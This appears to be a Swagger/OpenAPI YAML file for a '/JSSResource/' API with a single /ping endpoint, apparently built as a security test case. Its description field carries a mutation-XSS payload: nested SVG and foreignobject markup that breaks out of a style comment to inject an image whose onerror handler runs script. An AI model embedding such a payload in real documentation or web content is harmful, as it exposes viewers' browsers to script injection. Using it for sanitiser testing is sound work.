swagger: '3.0.0'
info:
  title: API Resource Documentation
  description: |
    <svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /ping:
    get:
      responses:
        200:
          description: OK
